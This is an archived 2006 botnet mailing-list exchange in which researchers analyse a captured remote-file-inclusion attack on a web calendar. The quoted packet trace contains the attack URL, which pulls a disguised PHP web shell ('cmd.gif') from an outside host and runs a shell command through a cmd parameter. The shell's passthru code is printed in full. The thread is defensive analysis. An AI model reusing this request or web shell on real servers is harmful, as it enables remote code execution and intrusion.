Re: [botnets] can't figure this one out

Christian Kreibich Mon, 20 Mar 2006 19:55:00 -0800

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Well given the trace I'd say this'll just sneak the output of 'which w'
into the output buffer. So a test to scan for injectability, maybe? I've
seen tests for injection in a bunch of attacks on twiki a while ago.


*shrug*

On Mon, 2006-03-20 at 07:08 -0600, [EMAIL PROTECTED] wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> I found a web calendar overflow that pulled this URL:
> 
> http://www.datatrade.com/downloads/.../cmd.gif
> 
> Here is the full trace:
> 23:37:49.503772 IP 64.34.197.189.49278 > 192.168.10.10.80: P 
> 3981950149:3981950460(311) ack 205900033 win 5840 <nop,nop,timestamp 
> 4530592 0>
>       0x0000:  4510 016b 9d5b 4000 3706 d48f 4022 c5bd  [EMAIL PROTECTED]@"..
>       0x0010:  c0a8 0a0a c07e 0050 ed57 bcc5 0c45 c901  .....~.P.W...E..
>       0x0020:  8018 16d0 5fcf 0000 0101 080a 0045 21a0  ...._........E!.
>       0x0030:  0000 0000 4745 5420 2f2f 6361 6c65 6e64  ....GET.//calend
>       0x0040:  6172 2f74 6f6f 6c73 2f73 656e 645f 7265  ar/tools/send_re
>       0x0050:  6d69 6e64 6572 732e 7068 703f 696e 636c  minders.php?incl
>       0x0060:  7564 6564 6972 3d68 7474 703a 2f2f 7777  udedir=http://ww
>       0x0070:  772e 6461 7461 7472 6164 652e 636f 6d2f  w.datatrade.com/
>       0x0080:  646f 776e 6c6f 6164 732f 2e2e 2e2f 636d  downloads/.../cm
>       0x0090:  642e 6769 663f 2663 6d64 3d65 6368 6f3b  d.gif?&cmd=echo;
>       0x00a0:  7768 6963 6825 3230 773b 6563 686f 2048  which%20w;echo.H
>       0x00b0:  5454 502f 312e 310d 0a41 6363 6570 743a  TTP/1.1..Accept:
>       0x00c0:  202a 2f2a 0d0a 4163 6365 7074 2d4c 616e  .*/*..Accept-Lan
>       0x00d0:  6775 6167 653a 2065 6e2d 7573 0d0a 4163  guage:.en-us..Ac
>       0x00e0:  6365 7074 2d45 6e63 6f64 696e 673a 2067  cept-Encoding:.g
>       0x00f0:  7a69 702c 2064 6566 6c61 7465 0d0a 5573  zip,.deflate..Us
>       0x0100:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
>       0x0110:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
>       0x0120:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
>       0x0150:  2e6f 7267 0d0a 436f 6e6e 6563 7469 6f6e  .org..Connection
>       0x0160:  3a20 436c 6f73 650d 0a0d 0a              :.Close....
> 
> When I look at the download file (cmd.gif) it doesn't seem to be complete:
> 
> <?
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
>   $output = ob_get_contents();
>   ob_end_clean();
>   if (!empty($output)) echo str_replace(">", "&gt;",   
> str_replace("<","&lt;", $output));
> 
> ?>
> 
> 
> So I am figuring this to be an attack directly against webcalendar and 
> not a php injection to build up a botnet.   Any input from the crew?
> 
> tc

Cheers,
Christian.
-- 
________________________________________________________________________
                                          http://www.cl.cam.ac.uk/~cpk25
                                                    http://www.whoop.org

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Re: [botnets] can't figure this one out

Reply via email to